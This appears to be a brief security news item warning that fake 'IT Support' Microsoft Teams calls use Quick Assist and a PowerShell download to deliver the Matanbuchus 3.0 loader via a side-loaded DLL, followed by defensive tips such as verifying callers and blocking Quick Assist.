Fake “IT Help Desk” Teams Calls Drop Sneaky Matanbuchus 3.0 Malware
Researchers have spotted Matanbuchus 3.0, an upgraded malware‑as‑a‑service loader, being pushed through Microsoft Teams calls that pose as helpful IT staff. Targets are tricked into launching Quick Assist, granting attackers remote access so they can run a PowerShell script that drops the loader. Matanbuchus 3.0 boasts stealthier comms, in‑memory tricks, and support for CMD/PowerShell reverse shells. Sold for $10–15 k per month, it can fetch extra payloads like Cobalt Strike or ransomware. The initial payload is hidden in an archive containing a renamed Notepad++ updater (GUP), a tweaked XML file and a malicious DLL. Tactics echo those of Black Basta affiliates who combine phishing, Teams spoofing and remote‑desktop tools to breach firms.
Another day, another dodgy Teams call. This time crooks are peddling Matanbuchus 3.0, a malware loader that’s grown sharper teeth and a heftier price tag (£8–12 k a month, if you’re shopping).
How the scam works
1. An unexpected Teams call pops up, allegedly from “IT Support”.
2. The friendly voice persuades you to open Quick Assist so they can “fix” your PC.
3. A PowerShell one‑liner whizzes by, downloading an archive.
4. Inside: a fake Notepad++ updater, a tweaked XML, and one nasty DLL—aka Matanbuchus.
Why it’s nasty
• Sneakier comms and in‑memory execution keep AV tools snoozing.
• Fetches Cobalt Strike or ransomware on demand.
• Runs regsvr32, rundll32, msiexec—you name it—to stay under the radar.
Stay safe
• Verify every Teams caller (ring back via an internal number).
• Block Quick Assist for non‑admin users.
• Monitor for odd PowerShell spawns and side‑loaded DLLs.
Remember: if “IT” rings unannounced asking for remote control, hang up faster than you can say, “Have you tried turning it off and on again?”